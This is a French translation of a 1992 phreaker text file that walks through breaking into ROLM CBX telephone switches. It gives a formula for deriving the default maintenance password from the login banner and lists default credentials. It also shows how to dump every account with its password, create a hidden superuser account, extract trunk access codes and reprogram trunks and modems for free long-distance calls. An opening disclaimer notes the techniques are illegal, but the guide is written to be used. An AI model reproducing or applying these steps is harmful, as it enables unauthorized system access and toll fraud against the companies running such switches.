LES PBX PASSENT AU DIGITAL ROLM-CBX By Silicon Phreaker / UPI 0.00 -= DéCLARATION =- Ce fichier contient des informations qui ne devraient être considérées qu'à titre indicatif. Je ne saurais encourager l'application de ces techniques, car elles sont illégales. Je ne saurais donc assumer aucune responsabilité à propos de l'utilisation de ces informations. -= FIN DE LA DéCLARATION =- 0.50 - Table des Matières - Déclaration.............................................. 0.00 Table des Matières....................................... 0.50 Introduction............................................. 1.00 Ce qu'est un CBX......................................... 1.10 Pénétrer dans un ROLM CBX................................ 1.20 Que peut-on faire une fois à l'intérieur?................ 1.30 Utiliser l'interface de configuration interactive (ICI).. 1.40 Accéder à la liste des Trunk............................. 1.50 Accéder à la liste des Usagers........................... 1.60 Créer de nouveaux Acomptes............................... 1.70 Accéder à la liste du Hardware........................... 1.80 Accéder à la liste des Lignes Data & Setup............... 1.90 Conclusion............................................... 2.00 1.00 - Introduction - Salut les potes! Bienvenue dans ce guide des ROLM-CBX. Une partie de ce texte (principalement les mots de passe standards) provient de l'intro d'un T-file écrit par Tracer. Il faut donner le crédit là où il est dû. La raison qui m'a poussé à écrire ce texte? Je considère qu'il n'y avait pas encore eu un bon texte sur les ROLM-CBX, un long texte qui couvrirait vraiment l'ensemble du sujet. Alors, le texte qui suit peut être considéré comme une somme en la matière, à défaut de posséder le manuel original. En espérant que vous le trouviez pratique et qu'il puisse vous donner un coup de main lors de votre prochaine incursion dans le "cyberspace"... 1.10 - Ce qu'est un CBX - CBX veut dire "Computerized Branch Exchange". En d'autres mots, c'est un PBX qui fonctionne à partir d'un ordinateur. Habituellement, un CBX pourra contrôler, au choix, un PBX local où pour les longues distances, ainsi que toute une variété de services, comme la messagerie vocale et le système téléphonique de la compagnie à l'interne. Le CBX peut aussi exécuter toute une série de commandes standard, comme les renvois d'appel, les dial-in et les dial-out. Un usage possible du CBX, par exemple, peut être de le programmer afin qu'il effectue un renvoi d'appel vers un PBX longue-distance à partir d'un dial out. En bref, les possibilités qu'offre un CBX à tout bon hacker ne sont définies que par les limites de son imagination. 1.20 - Pénétrer dans un ROLM-CBX - Quand vous entrez et que vous loggez sur un tel système, voici la première chose que vous apercevez en en-tête: ROLM CBX SITE ID: SEARS31332 RELEASE: 9004.4.20 BIND DATE: 19/DEC/88 COPYRIGHT (C) ROLM CORPORATION, 1987 ALL RIGHTS RESERVED - PROPERTY OF ROLM CORPORATION 03:34:55 ON MONDAY 6/22/1992 33 DEGREES C Lorsque le système demandera le nom d'usager, entrez: ENG Maintenant, pour trouver le mot de passe par défaut (standard), prenez le jour du mois de l'en-tête (22), ajoutez-y le numéro de node (habituellement 1), plus le premier chiffre de la minute (ici 0). Dans le cas présent, le total est 23. Utilisez le dernier chiffre de ce total (3) en le plaçant comme le premier chiffre du mot de passe. Ajoutez maintenant les caractères suivants (WID), le numéro du système (ici 31332) et la première lettre du mois courant (F). Dans le cas présent, le mot de passe devrait ressembler à çà: 3WID31332F Si cette technique arcane, mais authentique ne fonctionne pas pour vous, essayez le truc suivant. USERNAME: SU PASSWORD: SUPER ou USERNAME: SYSADMIN PASSWORD: ROLM ou ROLM-VLCBX ou SYSADMIN 1.30 - Utiliser le CBX - Le prompt pour un CBX va comme suit : %. La commande pour accéder au Help est : ? Le Help devrait vous présenter la liste des commandes suivantes : ABORT ACTIVATE ATTR BYE CANCEL CARD CDRSM CDT CHANGE CHG CLEAR CLR CMPCT CMSTS CNCL CNFG CONVERT COPY CPEG CTMON CTRA CTRTL CXCLR COPY CXCLR CXCON CXNET DACK DADD DAEVT DANS DBDMP DCAT DCF DCOM DDMA DDQ DDT DE DEACTIVATE DEFINE DELETE DEMOUNT DESUM DEX DFACK DFCOM DFEAT DFEVT DHTQ DHWS DIAG DIQ DISABLE DIWQ DKQ DML DMNT DMS DMTST DOWN DPATR DPMR DPMS DPPRI DPTR DQQ DRCT DREGS DSBLE DSQ DSST DSTAK DTCB DTDQ DWQ DX_TR ENABLE ENB ENBLE ETIO EX EXM EXN EXP EXPAND FINIT FORMAT FREER FSD GTOD HDBST HELP INSTALL KPFA LCT LIST LOAD LOGOFF LOGON LPEG LPKT LSCT LSL LST LTCB MNT MONITOR MOUNT MTRACE NEXT NSTAT PAGE PCNFG PDIO PFA PKTS PLIST PLTT PPFA PS PSH QAT QITM QTEST RCT RECEIVE RENAME REPLY RESTART RESTORE REVERSE RM RMOFF RPFA RSC RSCLK RSTOR RSTRT SAT SCAN SEND SETD SHOW SITM SOCON SOUNC SSAT START STATE STATUS STEST STOD STOP STRT STS TDCD TEST TKSTS TRTL TST TX UNLK UNLOCK UP VERIFY XDEF XMIT XPND Toutes ces commandes peuvent être placées à partir du prompt %. Certaines pourrait, dépendant de la configuration du système, être hors d'usage, ou pourraient ne pas être, tout simplement, disponibles, si vous n'êtes pas en mode diagnostic (DIAG). Nous allons maintenant porter notre attention sur l'interface de configuration interactive (ICI), qui joue une part vitale dans le fonctionnement du CBX. 1.40 - Utiliser le ICI - Au prompt, entrer la commande CNFG. % CNFG Une en-tête va apparaître. Elle devrait ressembler à ceci : CBX/9000 INTERACTIVE CONFIGURATION INTERFACE 15:14:32 ON MONDAY 6/22/1992 COMMAND: Ceci est le prompt principal. Si vous exécutez la commande ? , vous allez obtenir la liste des fonctions suivantes : MODIFY, CREATE, LIST, CHECK, EXIT, DONE, RESET, REBUILD. En entrant une de ces commandes, vous allez obtenir le prompt suivant : NOUN: Vous pouvez alors entrer "?" ou "ALL", qui jouent le rôle de "wildcard". Une liste des fonctions de configuration devrait apparaître : BUTTON_120 BUTTON_240 CDR_EXCLUDE CNFG_ERRORS CNFG_QUEUE CNFG_STATUS CNFG_USERS COM_GROUP COS_FEAT DATA_ESS DATA_DEVICE DATA_GROUP DATA_LINE DATA_SUBMUX DLI ETS EXTEN FAC FAC_TYPE FAMILY FEAT_CODE FIRST_DIGIT HD_GROUP LEX LOGON_PROFILE MAP MEM_PARTS PARAM PICK POWER Q_TYPE ROUTE_LK RP RPD RPI RPS_120S_ON RPS_240S_ON SAT_NAME SEARCH_SEQ SECTION SECURITY_GROUP SERVICE_LIST SIO_PARTS SLI SPEED T1D3 T1D3_GRP TRUNK TRUNK_GROUP VPC % CREATE LOGON_PROFILE ENTER NAME (1-12 CHAR): TEST ENTER PASSWORD: TEST RETYPE: TEST Ensuite, le système va vous demander un nom de "famille". Si vous voulez obtenir un accès "SuperUsager", tapez "SYSTEM_ADMIN" Après, la machine devrait maintenant vous demander un "verbe". Les verbes sont les fonctions, ou commandes, que l'usager identifié dans la "famille" peut utiliser. Des flags en quelque sorte... Toujours pour votre futur acompte "SuperUsager", entrez "SU" pour avoir accès à toutes les commandes. Pour obtenir une liste des usagers online au moment de votre appel, essayez ceci: % LIST CNFG_USERS NUMBER OF USERS MAX NUMBER OF USERS 3 5 PORT USER_NAME START_TIME HOW_LONG 17 SU 17:47:57 0:28:34 2 FIELD 18:16:03 0:0:28 3 MARYB 18:16:03 0:10:03 1.50 - Accéder à la liste des Trunks - En tout premier lieu, vous n'aviez bien sûr appelé sur ce système que pour utiliser le PBX, et non pas pour vous promener sur le système ou pour vous créer des acomptes. Eh bien, vous allez être servi! Pour obtenir le listing des trunks qui donnent accès au PBX, vous faites cette simple commande, à partir du prompt du ICI : COMMAND: LIST NOUN: TRUNK PAD: ALL Vous allez avoir toute une série d'informations diverses, la plupart de celles-ci concernant les numéros de nodes et les secteurs. Il vous faut en fait chercher, dans ce fouillis, une information semblable à celle-ci : TRUNK IDENTIFICATION NAME ------------------------------ ---------------- DS RJ 2/11 352-0515 CO START END CHECKS PASS INTCEPT TIME TIME ACT FAC WORD EXTN ----- ----- - - ---- ------- DS 00:00 23:59 N N 1357 255 Prenez en note le numéro d'identification du Trunk ainsi que son code, et vous avez maintenant un PBX qui n'attend que vos ordres... 1.60 - Accéder à la Liste des usagers - Maintenant, vous voulez trouver un acompte pour un de vos amis? Facile comme bonjour! Voici comment : A partir du ICI, faites : COMMAND: LIST NOUN: LOGON_PROFILE PAD: ALL Vous allez obtenir la liste complète des acomptes existants, avec les mots de passe et la liste des privilèges pour chacun. 1.70 - Créer de nouveaux acomptes - % CREATE LOGON_PROFILE ENTER NAME (1-12 CHAR): ACCOUNT_NAME ENTER PASSWORD: PASSWORD RE-TYPE PASSWORD: PASSWORD VERB: ALL Cette série de commandes vous permet de créer un acompte "Superusager" avec un accès TOTAL au système. 1.80 - Accéder à la liste du Hardware - Vous êtes probablement en train de vous demander: "Pourquoi est-ce que je devrais m'emmerder avec le matos du système", right? Que diriez-vous d'avoir un dialout à 9600 bauds? Cool, non? Peu importe, je vais vous montrer comment avoir accès au système, mais vous allez devoir vous débrouiller par vous-même pour rediriger le modem du système. Je n'ai pas le temps ni les connaissance nécessaires sur le ROLM-CBX pour vous le montrer avec certitude. Alors, voici pour avoir la liste du hardware... Vous entrez la commande suivante, toujours du ICI : % LIST DATA_DEVICE PAD: ALL Vous allez immédiatement obtenir la liste de tous les modems et de tous les terminaux branchés sur le système. En utilisant la commande MODIFY, vous devriez normalement pouvoir vous débrouiller pour changer le setting du modem pour qu'il puisse composer à partir du numéro de PBX que vous avez trouvé plus tôt. 1.90 - Accéder aux lignes Data et Setup - Une des hypothèses sur lesquelles j'ai travaillé est la suivante: Comment peut-on rediriger une ligne de la compagnie vers un numéro LD? J'ai trouvé la réponse... % LIST TRUNK PAD: ALL Cette commande va vous donner la liste des trunks. Ensuite, vous faites : % MODIFY TRUNK NOUN: Ensuite, entrez toutes les options que vous désirez. L'une de celles-ci sera un renvoi d,appel vers un autre numéro, LD si possible. En fait, programmez ici votre numéro de BBS LD ou de communication vocale, de façon à ce que la connexion soit toujours automatique. Votre appel vers ce numéro sera désormais gratuit... 2.00 - Conclusion - Ceci était mon premier, et probablement mon dernier, texte sur le phreaking pur et dur. Alors, amusez-vous, et surtout rappelez-vous: si vous ne réussissez pas du premier coup... essayez encore. Vous pourrez toujours cracker un système si vous y mettez assez d'efforts. Si vous avez un problème, une suggestion, ou un beau petit truc à me communiquer sur les ROLM/CBX, appelez mon board : The Dialup 514-XXX-XXXX (désolé, vous devrez demander autour de vous pour le numéro -Blitz) 1200 to 14.4k v32/bis NUP: CYBERNETIC LSD UPI East Coast Site NPC Site Ou appelez ma VMB (Sujet à changement) 1-800-521-2070 *168 (Si vous n'entendez pas du reggae ou un beat d'enfer, ce n'est pas la mienne) Et souvenez-vous: Les Fonecos ont ANI et vont, si elles le peuvent, l'utiliser pour vous botter le cul jusqu'en prison! Vous allez vous retrouver sur la paille humide des cachots tellement vite que vous ne saurez jamais ce qui s'est passé! Paix et Anarchie! Greetings: Mechanix (pour m'avoir introduit aux CBX), Telephatic Slayer, The Lost Avenger, Arch Bishop, Ratpack (fine AE system you got), G0DMOTHER, Rock Steady, The Darkman (Où que tu sois. Je sais, mais...), Atreid Bevatron et toute la gang de NPC, Tracer (pour son fichier original sur les CBX), et tous ceux que j'aurais pu oublier... Grunts: Avis à tous les NARCS qui lisent ceci: où croyez-vous que ça vous conduit, tous vos enfantillages? Au nom du ciel, essayez de penser à l'impact de vos petites vendettas personnelles contre les membres de la communauté H/P. Vous croyez que vous êtes un dur parce que vous avez réussi à faire déraper ce pirate-ci ou celui- là? Comment vous sentiriez-vous si quelqu'un vous traitait de la sorte? Probablement ben mal... Nous devons travailler en équipe, et ne pas partir de guerre les uns contre les autres. Silicon Phreaker / UPI. Word Up. [Traduction: Blitzkreig]